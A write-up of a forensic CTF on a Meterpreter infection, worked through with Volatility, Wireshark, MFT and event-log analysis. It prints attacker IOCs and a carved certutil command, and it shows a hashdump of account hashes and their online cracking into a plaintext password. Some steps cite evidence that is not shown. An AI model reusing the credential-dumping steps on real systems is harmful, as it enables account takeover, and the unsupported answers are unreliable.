
Intro

This is the first post in a two-part series on a fun forensic CTF hosted by CyberDefenders.org. The objective is to answer a series of typical incident response questions surrounding a malware infection.

You are provided with the following files to aid in your analysis:

  • memory dump
  • partial registry dump
  • copy of the NTFS $MFT
  • 2x packet captures
  • Windows event logs (evtx)

Walkthrough

1) What is the build number (in the format ddddd, where each d is a single decimal number, for example - 12345) of the installed Windows version?

python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem imageinfo

          Suggested Profile(s) : Win10x64_17134, Win10x64_14393, Win10x64_10586, Win10x64_16299, Win2016x64_14393, Win10x64_17763, Win10x64_15063 (Instantiated with Win10x64_15063)
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/Users/apdavies03/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem)
                      PAE type : No PAE
                           DTB : 0x1aa002L
                          KDBG : 0xf8002003a520L
          Number of Processors : 2
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff8001ed49000L
                KPCR for CPU 1 : 0xffff9c01cb3e0000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2020-06-20 19:48:43 UTC+0000
     Image local date and time : 2020-06-20 12:48:43 -0700

imageinfo lists several candidate profiles; the first suggestion carries the build number. Moving forward we need to pass the following profile to every vol.py command so that it correctly parses the memory image:

--profile=Win10x64_17134

Answer:

17134

2) What is the parent process PID of the process that accepts incoming network connections on port 1900/UDP?

$ python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem --profile=Win10x64_17134 netscan
...
0xcd83ffc3a2f0     UDPv6    ::1:1900                       *:*                                   4688     svchost.exe    2020-06-20 18:36:22 UTC+0000

But we are after the parent of 4688:

python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem --profile=Win10x64_17134 pstree > ps.txt
grep 4688 ps.txt 
.. 0xffffcd83ffc5c580:svchost.exe                    4688    648      6      0 2020-06-20 18:36:22 UTC+0000

Answer:

648

3) What is the IP address of the attacker's command and control center, the connection to which was still active at the time of forensic artifact acquisition?

From the netscan output we are looking for ESTABLISHED connections to external (non-RFC1918) IPs:

0xcd840169d2f0     TCPv4    192.168.184.130:50133          196.6.112.70:443     ESTABLISHED      -1    

Answer:

196.6.112.70

4) What is the PID of the process in which malicious code was located at the moment of forensic artifact acquisition?

$ python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem --profile=Win10x64_17134 pstree

 0xffffcd840106d580:winlogon.exe                     3232   6064      7      0 2020-06-20 19:28:44 UTC+0000
. 0xffffcd84012a84c0:cmd.exe                         5224   3232      0 ------ 2020-06-20 19:29:54 UTC+0000
. 0xffffcd8401109580:fontdrvhost.ex                  4852   3232      5      0 2020-06-20 19:28:44 UTC+0000
. 0xffffcd83ffef2580:userinit.exe                    1748   3232      0 ------ 2020-06-20 19:28:55 UTC+0000
...
... 0xffffcd84020d0580:powershell.exe                9188   5472     12      0 2020-06-20 19:38:52 UTC+0000
.... 0xffffcd84020e9580:conhost.exe                  9204   9188      5      0 2020-06-20 19:38:52 UTC+0000
... 0xffffcd8401779580:MSASCuiL.exe                  1012   5472      3      0 2020-06-20 19:29:09 UTC+0000
... 0xffffcd84005de580:WINWORD.EXE                   7312   5472      0 ------ 2020-06-20 19:47:01 UTC+0000
... 0xffffcd84010ba080:OneDrive.exe                  4572   5472     24      0 2020-06-20 19:29:12 UTC+0000
... 0xffffcd83fe8b2580:vmtoolsd.exe                  6624   5472      9      0 2020-06-20 19:29:10 UTC+0000
. 0xffffcd83febcf580:cmd.exe                         3928   3232      0 ------ 2020-06-20 19:34:27 UTC+0000
. 0xffffcd8400e37080:cmd.exe                          288   3232      0 ------ 2020-06-20 19:33:00 UTC+0000
. 0xffffcd83fecff080:dwm.exe                         8100   3232     11      0 2020-06-20 19:28:44 UTC+0000

winlogon.exe (PID 3232) should not be spawning cmd.exe, yet three cmd.exe children hang off it here; question 7 confirms the malicious code migrated into this process.

Answer:

3232
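
As an added example (not part of the original walkthrough), the Python below parses the Volatility 2 netscan and pstree text output shown above and answers questions 2 to 4 programmatically: the UDP/1900 listener and its parent, ESTABLISHED sessions to non-private addresses, and children of winlogon.exe that fall outside a baseline. The sample lines are copied from the output above; the baseline of what winlogon.exe normally spawns is an assumption of this example, not something the challenge states.

```python
import ipaddress
import re

# Constructed excerpts copied from the netscan and pstree output above.
NETSCAN_SAMPLE = """\
0xcd83ffc3a2f0     UDPv6    ::1:1900                       *:*                                   4688     svchost.exe    2020-06-20 18:36:22 UTC+0000
0xcd840169d2f0     TCPv4    192.168.184.130:50133          196.6.112.70:443     ESTABLISHED      -1
0xcd83fec7f700     TCPv4    192.168.184.130:50368          192.168.184.100:445  ESTABLISHED      -1
"""

PSTREE_SAMPLE = """\
.. 0xffffcd83ffc5c580:svchost.exe                    4688    648      6      0 2020-06-20 18:36:22 UTC+0000
 0xffffcd840106d580:winlogon.exe                     3232   6064      7      0 2020-06-20 19:28:44 UTC+0000
. 0xffffcd84012a84c0:cmd.exe                         5224   3232      0 ------ 2020-06-20 19:29:54 UTC+0000
. 0xffffcd8401109580:fontdrvhost.ex                  4852   3232      5      0 2020-06-20 19:28:44 UTC+0000
. 0xffffcd83ffef2580:userinit.exe                    1748   3232      0 ------ 2020-06-20 19:28:55 UTC+0000
. 0xffffcd83febcf580:cmd.exe                         3928   3232      0 ------ 2020-06-20 19:34:27 UTC+0000
. 0xffffcd8400e37080:cmd.exe                          288   3232      0 ------ 2020-06-20 19:33:00 UTC+0000
. 0xffffcd83fecff080:dwm.exe                         8100   3232     11      0 2020-06-20 19:28:44 UTC+0000
"""

# netscan columns: offset, proto, local, foreign, [state], pid, [owner], created.
# UDP rows have no state column and TCP rows carved without an owner show -1.
NETSCAN_RE = re.compile(
    r"^(?P<offset>0x[0-9a-f]+)\s+(?P<proto>[TU][CD]Pv[46])\s+"
    r"(?P<local>\S+)\s+(?P<foreign>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>-?\d+)(?:\s+(?P<owner>\S+))?"
)
# pstree: leading dots show depth, then offset:name pid ppid threads handles ...
PSTREE_RE = re.compile(
    r"^\.*\s*(?P<offset>0x[0-9a-f]+):(?P<name>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)"
)

# Baseline assumption of this example (not from the challenge): the images
# winlogon.exe normally launches on Windows 10. pstree truncates image names
# to 14 characters ("fontdrvhost.ex"), so names are compared by prefix.
EXPECTED_WINLOGON_CHILDREN = ("userinit.exe", "fontdrvhost.exe", "dwm.exe", "LogonUI.exe")


def parse_netscan(text):
    rows = []
    for line in text.splitlines():
        m = NETSCAN_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["pid"] = int(row["pid"])
            row["local_host"], _, row["local_port"] = row["local"].rpartition(":")
            row["foreign_host"], _, row["foreign_port"] = row["foreign"].rpartition(":")
            rows.append(row)
    return rows


def parse_pstree(text):
    procs = {}
    for line in text.splitlines():
        m = PSTREE_RE.match(line.strip())
        if m:
            procs[int(m["pid"])] = {"name": m["name"], "ppid": int(m["ppid"])}
    return procs


def listener_pid(rows, proto, port):
    """PID owning a socket bound to `port` for `proto` ("UDP"/"TCP") with no peer."""
    for r in rows:
        if r["proto"].startswith(proto) and r["local_port"] == port and r["foreign"] == "*:*":
            return r["pid"]
    return None


def parent_pid(procs, pid):
    return procs[pid]["ppid"] if pid in procs else None


def external_established(rows):
    """(foreign host, port) of ESTABLISHED TCP sessions to non-private addresses."""
    hits = []
    for r in rows:
        if r["state"] != "ESTABLISHED":
            continue
        try:
            ip = ipaddress.ip_address(r["foreign_host"])
        except ValueError:
            continue
        if not (ip.is_private or ip.is_loopback):
            hits.append((r["foreign_host"], r["foreign_port"]))
    return hits


def unexpected_children(procs, parent_name, expected=EXPECTED_WINLOGON_CHILDREN):
    """(parent pid, child pid, child name) for children outside the baseline."""
    parents = {pid for pid, p in procs.items() if p["name"] == parent_name}
    return [(p["ppid"], pid, p["name"]) for pid, p in procs.items()
            if p["ppid"] in parents and not any(e.startswith(p["name"]) for e in expected)]


if __name__ == "__main__":
    rows, procs = parse_netscan(NETSCAN_SAMPLE), parse_pstree(PSTREE_SAMPLE)
    pid = listener_pid(rows, "UDP", "1900")
    print("Q2: UDP/1900 listener", pid, "parent", parent_pid(procs, pid))
    print("Q3: external established", external_established(rows))
    print("Q4: unexpected winlogon children", unexpected_children(procs, "winlogon.exe"))
```

Matching by PID/PPID rather than by the dot depth keeps the parser correct when pstree output from different runs is pasted together, as in the sample above.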

5) On the compromised system, the malicious code discovered in the previous step is launched at every system start, since the attacker has used one of the persistence techniques. So, what is the name of the autostart entry (the part that is directly responsible for code execution) used by the attacker for persistence?

Use the Microsoft-Windows-WMI-Activity/Operational log and search for the malware path to identify the WMI subscription. Event ID 5861 is written when a permanent WMI event subscription is registered and records the filter, the consumer and their binding; the consumer is the part that actually executes code.

To make this question even easier, we even patched Sans-DeepBlueCLI and submitted a pull request.

Answer:

LogRotate Consumer
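
As an added example (not the walkthrough's or DeepBlueCLI's code), the Python below takes the text of one Event ID 5861 message, splits it into the filter and consumer halves, and reports the consumer name as the autostart entry, flagging consumers that launch an interpreter or LOLBin. The sample message is constructed in the shape such events usually render in; only the consumer name comes from the answer above, while the filter name, WQL query and command line are placeholders because the walkthrough does not reproduce them.

```python
import re

# Constructed sample in the shape of a Microsoft-Windows-WMI-Activity/Operational
# Event ID 5861 message (layout assumed from the event's usual rendering).  The
# consumer name is the walkthrough's answer; filter name, query and command line
# are placeholders, not values from the challenge.
SAMPLE_5861 = """\
Namespace = //./root/subscription; Eventfilter = ExampleFilter (refer to its activate eventid:5859); Consumer = CommandLineEventConsumer="LogRotate Consumer"; PossibleCause = Binding EventFilter:
instance of __EventFilter
{
\tCreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0};
\tEventNamespace = "root\\\\cimv2";
\tName = "ExampleFilter";
\tQuery = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
\tQueryLanguage = "WQL";
};
Perm. Consumer:
instance of CommandLineEventConsumer
{
\tCommandLineTemplate = "powershell.exe <PLACEHOLDER: real command line not shown in the walkthrough>";
\tCreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0};
\tName = "LogRotate Consumer";
};
"""

# The one-line binding summary at the top of the message.  The consumer may be
# rendered as Type="Name" or Type.Name="Name" depending on the build, so both
# spellings are accepted.
BINDING_RE = re.compile(
    r"Namespace = (?P<ns>\S+); Eventfilter = (?P<filter>.+?) \(refer to its activate eventid:5859\); "
    r"Consumer = (?P<ctype>\w+)(?:\.Name)?=\"(?P<cname>[^\"]+)\""
)
# Quoted properties inside the MOF-style instance dumps (one per line).
PROP_RE = re.compile(r'^\s*(\w+) = "(.*)";$', re.M)

# Launchers that turn a consumer into arbitrary code execution.
LAUNCHERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32", "regsvr32")


def parse_5861(message):
    """Return the binding summary plus the filter's and consumer's quoted properties."""
    head = BINDING_RE.search(message)
    if not head:
        return None
    filter_block, _, consumer_block = message.partition("Perm. Consumer:")
    return {
        "namespace": head["ns"],
        "consumer_type": head["ctype"],
        "consumer_name": head["cname"],
        "filter": dict(PROP_RE.findall(filter_block)),
        "consumer": dict(PROP_RE.findall(consumer_block)),
    }


def autostart_entry(parsed):
    """The consumer is the half of the binding that runs code: that is the persistence entry."""
    return parsed["consumer_name"]


def is_suspicious(parsed):
    """Any script consumer, or a command-line consumer that invokes a known launcher."""
    if parsed["consumer_type"] == "ActiveScriptEventConsumer":
        return True
    cmd = parsed["consumer"].get("CommandLineTemplate", "") + parsed["consumer"].get("ExecutablePath", "")
    return any(launcher in cmd.lower() for launcher in LAUNCHERS)


if __name__ == "__main__":
    parsed = parse_5861(SAMPLE_5861)
    print("autostart entry:", autostart_entry(parsed))
    print("filter query:", parsed["filter"].get("Query"))
    print("suspicious:", is_suspicious(parsed))
```

On a live system the same message text is what Get-WinEvent returns for the event; feeding each 5861 message through parse_5861 gives a quick inventory of every permanent subscription the log has seen.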

6) The autostart entry from the previous step is used to launch a script, which in turn leads to malicious code execution in the memory of the process discussed in question 4. This code is extracted by the script from some system location in encoded form. The decoded value of this string is an executable PE file. How did Microsoft Antivirus detect this file on 2020-06-21?

Easy enough, once you've answered question 8: upload the sample's hash to VirusTotal.

Answer:

Trojan:Win64/Meterpreter.E

7) The process mentioned in question 4 isn't the initial process in which the malicious code described in the previous question was executed by the script from autostart. What is the name of the initial process (in the format program.exe) that is spawned by the autostart script and used for further malicious code execution, which subsequently migrates to the address space of the process mentioned in question 4?

Look back at the pstree (process tree) output from earlier; dwm.exe is the other child of winlogon.exe (PID 3232):

. 0xffffcd83fecff080:dwm.exe                         8100   3232     11      0 2020-06-20 19:28:44 UTC+0000

Answer:

dwm.exe

8) The autostart entry from the previous step is used to launch the script, which in turn leads to the malicious code execution in the memory of the process discussed in question 4. The script that runs at each system start (which is described in question 6) was downloaded to the compromised system from the Internet. Provide the URL which was used to download this script.

This was more difficult: first we dumped the memory of the child PowerShell processes (knowing the loader was a PowerShell script in memory), then we grepped for odd URL strings:

egrep "https://...\..................\..../.*"
...

Answer:

https://raw.githubusercontent.com/xia33F/APT/master/payloads/wrapper_page

9) The system was compromised as the result of opening a Microsoft Office document received by email. What is the MD5 hash of this document (for example, d41d8cd98f00b204e9800998ecf8427e)?

For this challenge we utilised Wireshark, used the filter “SMTP”, and traversed all the SMTP streams until we found several attachments (word doc, zip file, pdf) as base64-encoded attachments. Simply copy and paste the base64 code to a file and base64-decode it, check the file type, and further unwrap the containers:

base64 -d b64_file > filedecoded
file filedecoded
 ZIP
mv filedecoded filedecoded.zip
unzip filedecoded.zip
Why Saudi Arabia Will Lose The Next Oil Price War.docx
md5 "Why Saudi Arabia Will Lose The Next Oil Price War.docx"

Answer:

aa7ee7f712780aebe9136cabc24bf875

10) The document that was initially opened by the user didn't contain anything malicious itself. It downloaded another document from the Internet as a Microsoft Word template. The malicious code which led to the system compromise is located directly inside this template. What link was used by the first document to download the second document as a template (for example, https://address/file.com)?

Open the document in a sandbox, or inspect it with Didier Stevens' OLE tools; the remote template link lives in the document's relationship files.

Answer:

http://75.19.45.11/Supplement.dotm

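To show questions 9 and 10 end to end as an added example (not the walkthrough's own code), the Python below builds a constructed e-mail whose zip attachment wraps a minimal .docx skeleton, then does what the shell steps above do: decodes the attachment, identifies it by magic bytes, unwraps the outer container, hashes the document and reads its relationship files for an external attachedTemplate target. The addresses, file contents and the outer zip name are constructed; the template URL and the document name are the values from the answers above; the MD5 it computes is that of the constructed sample, not the challenge document's.

```python
import email
import hashlib
import io
import xml.etree.ElementTree as ET
import zipfile
from email import policy
from email.message import EmailMessage

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
TEMPLATE_URL = "http://75.19.45.11/Supplement.dotm"  # answer to question 10
DOC_NAME = "Why Saudi Arabia Will Lose The Next Oil Price War.docx"  # attachment name from question 9


def build_sample_docx(template_url):
    """Constructed minimal OOXML skeleton whose settings relationships point at a remote template."""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_url}" TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def wrap_in_zip(name, data):
    """Constructed outer container, mirroring the zip the walkthrough had to unpack first."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(name, data)
    return buf.getvalue()


def build_sample_email(attachment, filename):
    """Constructed RFC 822 message standing in for the SMTP stream carved out of the pcap."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "constructed sample"
    msg.set_content("see attached")
    msg.add_attachment(attachment, maintype="application", subtype="zip", filename=filename)
    return msg.as_bytes()


def extract_attachments(raw):
    """Yield (filename, decoded bytes) for every attachment; this is the `base64 -d` step."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    for part in msg.iter_attachments():
        yield part.get_filename(), part.get_payload(decode=True)


def identify(data):
    """Tiny magic-number check in the spirit of `file`."""
    if data[:4] == b"PK\x03\x04":
        return "zip"
    if data[:5] == b"%PDF-":
        return "pdf"
    if data[:8] == b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1":
        return "ole"
    return "unknown"


def is_ooxml(data):
    """A .docx is itself a zip; the content-types part tells it apart from a plain container."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return "[Content_Types].xml" in z.namelist()
    except zipfile.BadZipFile:
        return False


def unwrap(name, data):
    """Descend through plain zip containers until reaching non-zip or OOXML files."""
    if identify(data) == "zip" and not is_ooxml(data):
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return [hit for inner in z.namelist() for hit in unwrap(inner, z.read(inner))]
    return [(name, data)]


def remote_templates(docx_bytes):
    """Targets of external attachedTemplate relationships anywhere in the package."""
    urls = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External":
                    urls.append(rel.get("Target"))
    return urls


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def analyse(raw_email):
    """One record per unwrapped file: name, type, MD5 and any remote template links."""
    results = []
    for fname, payload in extract_attachments(raw_email):
        for name, data in unwrap(fname, payload):
            results.append({"name": name, "type": identify(data), "md5": md5_hex(data),
                            "remote_templates": remote_templates(data) if is_ooxml(data) else []})
    return results


if __name__ == "__main__":
    doc = build_sample_docx(TEMPLATE_URL)
    raw = build_sample_email(wrap_in_zip(DOC_NAME, doc), "attachment.zip")
    for record in analyse(raw):
        print(record)
```

Checking every .rels part rather than only word/_rels/settings.xml.rels costs nothing and also catches external targets that were placed elsewhere in the package.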
11) During post-exploitation the attacker delivered a special Active Directory enumeration utility to the compromised host. Which link did the attacker use to download this utility (for example, https://address/file.com)?

Using the MITRE ATT&CK matrix, a common tool for this is certutil; there are two ways to attack this question:

  • 1) Look at the pcap (traffic_2.pcapng) with an HTTP filter and look for the following user agent:
     http.user_agent == "Microsoft-CryptoAPI/10.0"
     Follow the stream (tcp.stream eq 102) and note the destination IP/URL.

  • 2) Carve the PowerShell process memory dump for certutil:
     $ strings 3232.dmp | grep certutil
     4certutil -decode %tmp%\disco.jpg:sh %tmp%\sh.exe
     From the open (netscan) connections we know the IP is 196.6.112.70.

Answer:

http://196.6.112.70/disco.jpg

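For questions 8 and 11 the walkthrough greps strings out of a process memory dump. As an added example (not the walkthrough's own code), the Python below does the same over a constructed byte string, with one extra step a practitioner wants: PowerShell keeps its strings as UTF-16LE, which a default `strings`/`grep` pass misses, so both ASCII and wide runs are decoded before searching for URLs and certutil invocations. The sample bytes embed the two URLs and the certutil line from the answers above; everything else in them is filler.

```python
import re

# Constructed stand-in for a carved process dump: filler bytes, one PowerShell
# variable assignment stored as UTF-16LE (as PowerShell keeps its strings), the
# certutil line and the download URL from the answers above as plain ASCII, and
# a fragment too short to count as a string.
SAMPLE_DUMP = (
    b"\x00\x00\x90\x90MZ\x00\x00"
    + "$u = 'https://raw.githubusercontent.com/xia33F/APT/master/payloads/wrapper_page'".encode("utf-16-le")
    + b"\x00\x00"
    + b"4certutil -decode %tmp%\\disco.jpg:sh %tmp%\\sh.exe\x00"
    + b"http://196.6.112.70/disco.jpg\x00"
    + b"ab\x00cd\x00"
)

ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")          # what `strings` prints by default
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")   # what `strings -el` would add
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# certutil switches commonly seen when it is used to fetch or decode a payload.
CERTUTIL_RE = re.compile(r"certutil(?:\.exe)?\s+-(?:decode|urlcache|encode|verifyctl)\b", re.IGNORECASE)


def extract_strings(data):
    """Printable ASCII and UTF-16LE runs as (offset, encoding, text), in file order."""
    found = [(m.start(), "ascii", m.group().decode("ascii")) for m in ASCII_RUN.finditer(data)]
    found += [(m.start(), "utf-16le", m.group().decode("utf-16-le")) for m in WIDE_RUN.finditer(data)]
    return sorted(found)


def find_urls(data):
    """Unique URLs seen in either encoding."""
    return sorted({url for _, _, text in extract_strings(data) for url in URL_RE.findall(text)})


def find_certutil(data):
    """Strings that look like a certutil download/decode invocation."""
    return [text for _, _, text in extract_strings(data) if CERTUTIL_RE.search(text)]


if __name__ == "__main__":
    for offset, enc, text in extract_strings(SAMPLE_DUMP):
        print(f"{offset:#08x} {enc:8} {text}")
    print("URLs:", find_urls(SAMPLE_DUMP))
    print("certutil:", find_certutil(SAMPLE_DUMP))
```

Against a real dump, read the file with `open(path, "rb").read()` and pass the bytes in; the wide-string regex is what makes the PowerShell loader's URL visible at all.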
12) As described in the previous question, the utility created several files on the compromised system that were subsequently deleted by the attacker. One of the created files had a .bin extension. What is the name of this file (for example, name.bin)?

Two ways to do this:

  • 1) Parse the MFT with analyzeMFT and grep for .bin files:
     virtualenv -p /opt/local/bin/python2.7 venv
     python ./setup.py build
     python ./setup.py install
     python ./analyzeMFT.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/\$MFT.copy0 -o dump.csv
     grep -v -i microsoft dump.csv | grep ".bin"
     ...
     2020-06-20|19:31:38.501654|TZ|...B|FILE|NTFS $MFT|$FN [...B] time|user|host|/Windows/Temp/ODNhN2YwNWUtYWFmYy00MDVmLWFhYTQtNGMzM2Q3NmYwMWM4.bin|desc|version|/Windows/Temp/ODNhN2YwNWUtYWFmYy00MDVmLWFhYTQtNGMzM2Q3NmYwMWM4.bin|7||format|extra

  • 2) Analyse the prefetch files with PECmd.exe (on Windows):
     PECmd.exe -f Prefetch\SH.EXE-89D7F45B.pf
     ...
     113: \VOLUME{... \TEMP\ODNHN2YWNWUTYWFMYY00MDVMLWFHYTQTNGMZM2Q3NMYWMWM4.BIN

Answer:

ODNHN2YWNWUTYWFMYY00MDVMLWFHYTQTNGMZM2Q3NMYWMWM4.BIN

13) During post-exploitation the attacker compromised a privileged user account. What is its password?

python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem --profile=Win10x64_17134 hashdump > hashes.txt
Volatility Foundation Volatility Framework 2.6.1
Administrator:500:63424d100a5717b0661f84ae789b82bd:34103925bb9f07248d0b3d3df50c9d4c:::
Guest:501:eddee9c278b95cf3880300ca22eddda0:06adfd21dc6db22b5ef3743b1b8c022b:::
DefaultAccount:503:3ac68f2d31f869d98fa5db8b9c405af1:b80c069e17138971f4d183f9d575ccb4:::
WDAGUtilityAccount:504:8c1c4c3110d3075c5e1b33fc5e3b30f0:899aa6ec601d70d34fb994c27ed93123:::
John Goldberg:1001:7d80c4bfe8857c6ec676aa3577e89e68:f7b1dce8a4445aea38d6a735ae0bf754:::
backupsrv:1003:291f7bc51dde8a64063b565c68579d95:0e651bf56065b19f5783bb59ad6e8bfc:::

Then use your cracking program, or search for the hashes online; we used https://crackstation.net/

Answer:

!!feb15th2k6!!

14) What is the name of the tool (for example, program.exe) that was probably used by the attacker to compromise the user account?

Since we know the PowerShell script loads a value from the registry, we can assume the attacker used the following command:

Answer:

reg.exe

15) The attacker used a compromised account for unauthorized Domain Controller access. What is the IP address of this Domain Controller?

Again, two ways to do this:

  • 1) Wireshark with an SMB filter (traffic_2.pcapng)
  • 2) Use Volatility: as we know the workstation is domain joined, there is likely an established connection over SMB (445):
     $ python2 ./vol.py -f ~/Downloads/CyberPolygon_Forensic_Artifacts/memdump.mem --profile=Win10x64_17134 netscan|grep 192.168.184.100
     0xcd83fec7f700     TCPv4    192.168.184.130:50368          192.168.184.100:445  ESTABLISHED      -1

Answer:

192.168.184.100

Tools

Here is the list of tools used in our analysis:

  • Volatility 2.6.1 (vol.py): imageinfo, netscan, pstree, hashdump
  • Wireshark
  • Sans-DeepBlueCLI
  • analyzeMFT
  • PECmd.exe
  • Didier Stevens' OLE tools
  • VirusTotal
  • CrackStation (https://crackstation.net/)
  • Standard command-line utilities: base64, file, unzip, md5, strings, grep/egrep